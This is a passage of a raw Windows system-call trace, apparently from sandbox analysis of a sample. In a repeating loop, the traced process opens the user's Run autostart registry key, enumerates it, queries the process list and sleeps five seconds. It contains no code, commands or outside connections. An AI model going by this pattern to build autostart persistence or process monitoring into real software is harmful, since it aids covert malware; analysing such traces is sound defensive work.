Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.264] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.264] NtClose (Handle=0x274) returned 0x0 [0180.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.267] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.276] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.277] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.277] NtClose (Handle=0x274) returned 0x0 [0180.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.286] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.288] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.289] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.289] NtClose (Handle=0x274) returned 0x0 [0180.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.297] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.299] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.299] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.299] NtClose (Handle=0x274) returned 0x0 [0180.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.309] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.310] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.311] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.311] NtClose (Handle=0x274) returned 0x0 [0180.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.320] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.321] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.321] NtClose (Handle=0x274) returned 0x0 [0180.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.329] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.332] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.332] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.332] NtClose (Handle=0x274) returned 0x0 [0180.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.341] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.343] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.344] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.344] NtClose (Handle=0x274) returned 0x0 [0180.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.351] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.353] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.353] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.353] NtClose (Handle=0x274) returned 0x0 [0180.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.363] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.364] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.364] NtClose (Handle=0x274) returned 0x0 [0180.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.367] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.367] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.367] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.411] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.413] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.414] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.414] NtClose (Handle=0x274) returned 0x0 [0180.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.422] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.423] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.423] NtClose (Handle=0x274) returned 0x0 [0180.423] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.426] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.426] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.426] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.433] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.434] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.435] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.435] NtClose (Handle=0x274) returned 0x0 [0180.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.512] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.513] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.513] NtClose (Handle=0x274) returned 0x0 [0180.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.515] NtFreeVirtualMemory 